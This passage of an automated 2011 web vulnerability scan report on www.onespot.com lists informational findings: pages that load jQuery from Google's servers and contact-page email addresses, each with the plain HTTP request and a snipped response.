<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.5. http://www.onespot.com/products/nextclick/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /products/nextclick/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/nextclick/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.3.10.1304962795

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:40:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.6. http://www.onespot.com/products/topic-pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /products/topic-pages/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/topic-pages/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/customers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.7.10.1304962795

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.7. http://www.onespot.com/publishers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /publishers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publishers/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304967098.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=35039743.1135348204.1304962795.1304962795.1304967098.2; __utmc=35039743; __utmb=35039743.1.10.1304967098

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 18:52:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.8. http://www.onespot.com/retailers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /retailers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /retailers/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/get-started/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304967098.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=35039743.1135348204.1304962795.1304962795.1304967098.2; __utmc=35039743; __utmb=35039743.1.10.1304967098

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 18:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

2.9. http://www.onespot.com/technology/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /technology/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /technology/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/products/nextclick/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304962795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=35039743.1135348204.1304962795.1304962795.1304962795.1; __utmc=35039743; __utmb=35039743.5.10.1304962795

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 17:41:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<!-- jQuery & form JavaScript (begin) -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

3. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onespot.com
Path:   /contact-us/

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /contact-us/ HTTP/1.1
Host: www.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.onespot.com/customers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=35039743.1304967098.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=35039743.1135348204.1304962795.1304962795.1304967098.2; __utmc=35039743; __utmb=35039743.4.10.1304967098

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 18:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.onespot.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<met
...[SNIP]...
<a href="mailto:press@onespot.com">press@onespot.com</a>
...[SNIP]...
<a href="mailto:sales@onespot.com">sales@onespot.com</a>
...[SNIP]...
<a href="mailto:bd@onespot.com">bd@onespot.com</a>
...[SNIP]...

Report generated by XSS.CX at Mon May 09 13:58:03 CDT 2011.